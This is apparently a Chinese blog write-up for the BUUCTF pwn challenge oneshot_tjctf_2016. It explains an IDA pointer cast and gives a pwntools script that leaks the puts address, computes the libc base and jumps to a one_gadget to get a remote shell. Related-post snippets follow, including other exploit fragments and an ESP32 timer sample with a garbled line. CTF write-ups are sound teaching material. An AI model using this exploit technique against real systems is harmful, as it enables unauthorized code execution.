BUUCTF之“oneshot_tjctf_2016”

最新推荐文章于 2024-03-30 15:58:25 发布
原创 最新推荐文章于 2024-03-30 15:58:25 发布 · 710 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn

本文介绍了通过泄露libc函数地址并计算基地址的方法,结合OneGadget工具找到execve地址的过程。文中详细解释了IDA中关于(_QWORD*)v4的操作含义及Python脚本实现。

咳咳,这题就是对于onegadget的简单复习:泄露libc库某个函数,然后计算基地址,结合onegadget计算execve地址。

IDA中需要注意的:

*(_QWORD *)v4

这里着重说下“*(_QWORD )”,我们将之拆开来说:
(_QWORD)意思是将八个字节的后者(v4)强制转换为8个字节的地址,而后再其前边加上星号就是提取指针“将指针指向的8个空间格子取出”,程序中的意思是,再将其以16进制形式打印出来。

WP:

from pwn import*
p=remote('node4.buuoj.cn',29008)
libc=ELF('./libc-2.23.so64')
elf=ELF('./shot')

puts_got=elf.got['puts']
p.sendlineafter("Read location?",str(puts_got))
p.recvuntil("0x")
addr_=int(p.recvuntil('\n'),16)

base=addr_-libc.symbols['puts']
onegad=base+0x45216

p.sendlineafter("Jump location?",str(onegad))
p.interactive()

WP中需要注意的:
一个是int的使用,
一个是str()的形式将"put_addr"和“onegad”输入上去:这是因为我们利用“send__的形式与远端进行交互,而send_的要求就是要发送字符,二者的都是地址,是数,所以我们的利用str()将其转成字符形式”

[BUUCTF]PWN——oneshot_tjctf_2016(one_gadget)
mcmuyanga的博客
02-01 999
oneshot_tjctf_2016 附件 步骤 例行检查,64位程序,开启了nx 本地试运行一下看看大概的情况 64位ida载入
buuctf 强制转换无符号数溢出 任意地址读、跳转 _printf_chk free_hook jmpesp scanf输入过长触发malloc
carol2358的博客
08-06 1324
文章目录zctf2016_note2 zctf2016_note2 本题的漏洞在这里 有符号数和无符号数进行了比较,转换为无符号数, 我们把size设为0,那-1就永远大于i,就可以溢出了 本题可以改got表,heap_ptr的地址也可以找到,那就unlink 改成这样就行,利用chunk1的溢出 然后改atoi为system, 输入sh就行了 exp: from pwn import * from LibcSearcher import * local_file = './note2' loca
oneshot_tjctf_2016
z1r0的博客
01-20 897
oneshot_tjctf_2016 查看保护 输入一个地址会跳到那个地址,再次输入会改那个地址 给got,改got为one_gadget即可。 from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 25658) else: r = process(file
[BUUCTF]-PWN:oneshot_tjctf_2016解析(字符串输入,onegadget)
2301_79326813的博客
03-02 377
查看保护查看ida这道题的大致思路就是泄露libc地址,然后用onegadget来getshell但是要注意,这里要我们输入的数据类型是long int,所以不能用我们常用的p64函数了。
2016TJCTF-RE-digital_fortrees
WocW的博客
04-16 337
分析 打开题目首先是一个exe可执行文件,以为是PE文件,但是使用IDA分析后发现不是那么简单。 查找字符串发现全是python字样,并没有程序中出现的welcome类型。第一次遇到这样的,无从下手。查阅得知是Python生成的Exe可执行文件。 这时候问题又来了,百度得到的几乎都是pyinstaller的解包过程,使用后无效。然后再问,被告知可用Binwalk分离出文件,分离结果可以得到茫茫多...
one_shot_minute03.exe
10-17
one_shot_minute03.exe
unsupervised_oneshot_mnist
02-16
在IT领域,特别是机器学习和深度学习中,"unsupervised_oneshot_mnist" 提供了一个有趣的实验场景。这个项目可能涉及到无监督学习和一次学习(one-shot learning)的概念,这两种方法在图像识别和模式识别任务中都有...
one_shot_3d_photography:该存储库包含SIGGRAPH 2020论文“ One Shot 3D Photography”的代码版本
03-18
这是``Tiefenrausch''深度估计方法的代码,我们在SIGGRAPH 2020中的论文One Shot 3D Photography中进行了描述。 它复制了表1中标记为“ Tiefenrausch(AS + quant)”的行,可用于评估。 为了获得更好的质量(即与...
buuctf pwn [rip] [warmup_csaw_2016 1] [ciscn_2019_n_1 1]
m0_62142241的博客
02-27 577
栈溢出 【以下这几题全是利用栈溢出来进行攻破】 相同步骤: 1.下载文件 2.启动靶机 3.打开Terminal(用nc打开端口,用ls打开目录及文件) 【nc的参数用法 -d 后台模式 -e prog 程序重定向,一旦连接,就执行 [危险!!] -g gateway source-routing hop point[s], up to 8 -G num source-routing pointer: 4, 8, 12, … -h 帮助信息 -i secs 延时的间隔 -l 监听模式,用于入站连接 -L 连
IDA Pro *(_QWORD *)和*(_BYTE *)表达式解释
Jingged的博客
03-30 3412
这种类型转换和解引用的组合在反汇编和逆向工程中非常常见,因为原始源代码中的数据类型和变量名在编译过程中通常会丢失,而分析人员需要依赖工具来理解和解释机器代码。作为一个整体,通常用于将一个地址(或其他整数)转换为一个指向64位无符号整数的指针,并获取该地址上的值。时,这通常意味着某个地址或值被转换为一个指向字节的指针,并且随后会解引用该指针以获取该地址上的字节值。允许你在不知道原始数据类型的情况下,以特定的方式(这里是64位无符号整数)解释和访问内存中的数据。类似,但这里涉及的是1字节(8位)的数据。
在栈和堆分配内存
心想事成
10-26 508
在栈和堆分配内存LUNICODE_STRING Src ; LUNICODE_STRING *Dst1 = new LUNICODE_STRING(); LUNICODE_STRING Dst2; RtlInitLUnicodeString(&Dst2, L""); RtlInitLUnicodeString(&Src, L"microsoft-windows-ie-windows-internet
[BMZCTF-pwn] 25-pwn3
weixin_52640415的博客
02-16 231
第三题的难度就突然上来了。程序先是个菜单,有好向项都没用;smsg先调用clear_string然后问是否发送,输入Y就退出循环 int smsg() { char v1; // [rsp+7h] [rbp-59h] BYREF void *buf; // [rsp+8h] [rbp-58h] BYREF char v3; // [rsp+10h] [rbp-50h] BYREF int v4; // [rsp+5Ch] [rbp-4h] v4 = 0; v1 = 78;
BUUCTF Reverse解题记录(三)
欢迎光临失去理智(sxhthreo)的博客~
03-03 4977
第九题:不一样的flag 这道题说实话我是看了题解才恍然大悟的。 1、2、3、4分别代表往上下左右四个方向走,由下语句: if ( v7[5 * *(_DWORD *)&v3[25] - 41 + v4] == 49 ) exit(1); if ( v7[5 * *(_DWORD *)&v3[25] - 41 + v4] == 35 ) { puts("\nok, the order you enter is the flag!"); exit(0);
buuoj Pwn writeup 101-105
yongbaoii的博客
03-08 311
101 inndy_echo 保护 就格式化字符串漏洞。 102 cmcc_pwnme1 保护 103 oneshot_tjctf_2016 保护 RELRO一点没开的…… 104 picoctf_2018_leak_me 保护 105 x_ctf_b0verfl0w 保护
bit,位,比特,比特位,byte联系与区别
热门推荐
学习笔记。
06-28 1万+
bit就是位,也叫比特位,是计算机中最小的单位 byte是字节也就是B 1byte = 1B 1byte = 2bit
关于bitcode, 知道这些就够了
chqj_163的专栏
05-15 9122
转载http://www.cocoachina.com/ios/20190108/26055.html 原文链接http://xelz.info/blog/2018/11/24/all-you-need-to-know-about-bitcode/ 0x00 前言 苹果在WWDC 2015大会上引入了bitcode,随后在Xcode7中添加了在二进制中嵌入bitcode(Ena...
C语言中怎么定义bit型数据
chenzoff的专栏
08-19 1万+
怎么定义bit型数据
结构体中使用的bit操作[转帖]
whbzealot的专栏
03-05 2035
PPT(77928793)  16:37:26 毋庸置疑,位域的引入给用户的最大的好处莫过于可以有效的利用昂贵的内存和操作bit的能力了。而且这种操作bit位的能力很是方便,利用结构体域名即可对这些bit进行操作。例如: struct foo { int a : 1; int b : 2; short c : 1; }; struc
esp32oneshot_read
最新发布
02-06
### ESP32 OneShot 读取示例代码 对于ESP32上的OneShot模式,通常用于精确的时间测量或事件触发。下面是一个简单的例子来展示如何配置并使用定时器的OneShot模式。 #### 配置和初始化定时器 ```cpp #include "driver/timer.h" #define ONE_SHOT_TIMER_GROUP TIMER_GROUP_0 #define ONE_SHOT_TIMER_INDEX TIMER_0 void setup_one_shot_timer() { /* 初始化定时器 */ timer_config_t config = { .divider = 80, .counter_dir = TIMER_COUNT_UP, .counter_en = TIMER_PAUSE, .alarm_en = TIMER_ALARM_EN, .auto_reload = false }; timer_init(ONE_SHOT_TIMER_GROUP, ONE_SHOT_TIMER_INDEX, &config); } ``` 此部分设置了一个基于硬件的计数器,该计数器将以指定频率运行,并且当达到预设值时会触发中断[^1]。 #### 设置报警时间并启动定时器 ```cpp void start_one_shot_timer(uint64_t alarm_value) { // 加载警报值到定时器中 timer_set_alarm_value(ONE_SHOT_TIMER_GROUP, ONE_SHOT_TIMER_INDEX, alarm_value); // 启用定时器的警报功能 timer_enable_intr(ONE_SHOT_TIMER_GROUP, ONE_SHOT_TIMER_INDEX); // 开始计数 timer_start(ONE_SHOT_TIMER_GROUP, ONE_SHOT_TIMER_INDEX); } // 假设我们希望在大约1秒后触发一次性的动作,则可以这样调用函数: start_one_shot_timer((uint64_t)(80 * 1e6)); // 一秒等于80M ticks ``` 这段代码展示了如何设定一个特定的时间间隔,在这个案例里是一秒钟之后触发一次性操作。通过调整`alarm_value`参数,可以根据实际需求改变延迟时间。 #### 中断处理程序 为了响应由定时器产生的中断信号,还需要定义相应的ISR(Interrupt Service Routine)。这里提供了一个基本框架: ```cpp static void IRAM_ATTR oneshot_isr_handler(void* arg) { uint32_t intr_status = TIMGn_INT_ST_TIMERS; if (intr_status & BIT(TIMER_0)) { // 清除中断标志位 TIMERG0.int_clr_timers.t0 = 1; // 执行想要完成的任务... // 如果需要再次启用定时器,记得重新加载新的警报值并重启它。 // start_one_shot_timer(new_alarm_value); } } // 注册中断服务例程 timer附着回调函数(oneshot_isr_handler, NULL); // 确保使能全局中断 portENABLE_INTERRUPTS(); ``` 上述片段说明了怎样编写一个能够捕捉来自定时器中断的服务程序,并执行必要的清理工作以及任何其他期望的操作。请注意,所有这些都应在IRAM属性下实现以确保性能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值